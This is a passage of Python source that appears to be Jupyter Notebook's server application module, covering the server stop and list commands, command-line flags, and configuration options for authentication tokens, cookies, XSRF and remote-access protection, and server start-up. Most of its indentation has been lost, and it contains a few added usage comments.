# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
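# Hedged usage note (not part of the original source): shutdown_server()
# expects one of the dicts produced by list_running_servers(), e.g.
#   for info in list_running_servers():
#       shutdown_server(info, timeout=10, log=app_log)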
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch another
# list of servers and ensure our server is not in the list before
# sending the wrong impression.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help=_('Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature was added that
prevents the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system to
run code in your Jupyter session as you.
However, in some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead to the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Setting this option to False will disable this behavior, allowing the browser
to launch using a URL and visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
While logging in with a token, the notebook server UI will give the user the
opportunity to enter a new password at the same time, which will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
(shutdown the notebook server)."""
)
contents_manager_class = Type(
default_value=LargeFileManager,
klass=ContentsManager,
config=True,
help=_('The notebook manager class to use.')
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
    iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
        Maximum rate at which stream output can be sent on iopub before it is
        limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
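    # A hedged configuration sketch (not part of the original source): in a
    # jupyter_notebook_config.py this timeout is typically combined with the
    # kernel culling option mentioned in the help text above, e.g.:
    #
    #   c.NotebookApp.shutdown_no_activity_timeout = 3600   # one hour of idleness
    #   c.MappingKernelManager.cull_idle_timeout = 600      # cull idle kernels first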
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
        Anything the user can do in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if sys.version_info < (3, 6): # Can be removed once 3.5 is dropped.
raise ValueError("You are using `AsyncMappingKernelManager` in Python 3.5 (or lower) "
"which is not supported. Please upgrade Python to 3.6+ or change kernel managers.")
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
        # This prevents double log messages because tornado uses a root logger that
        # self.log is a child of. The logging module dispatches log messages to a log
        # and all of its ancestors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
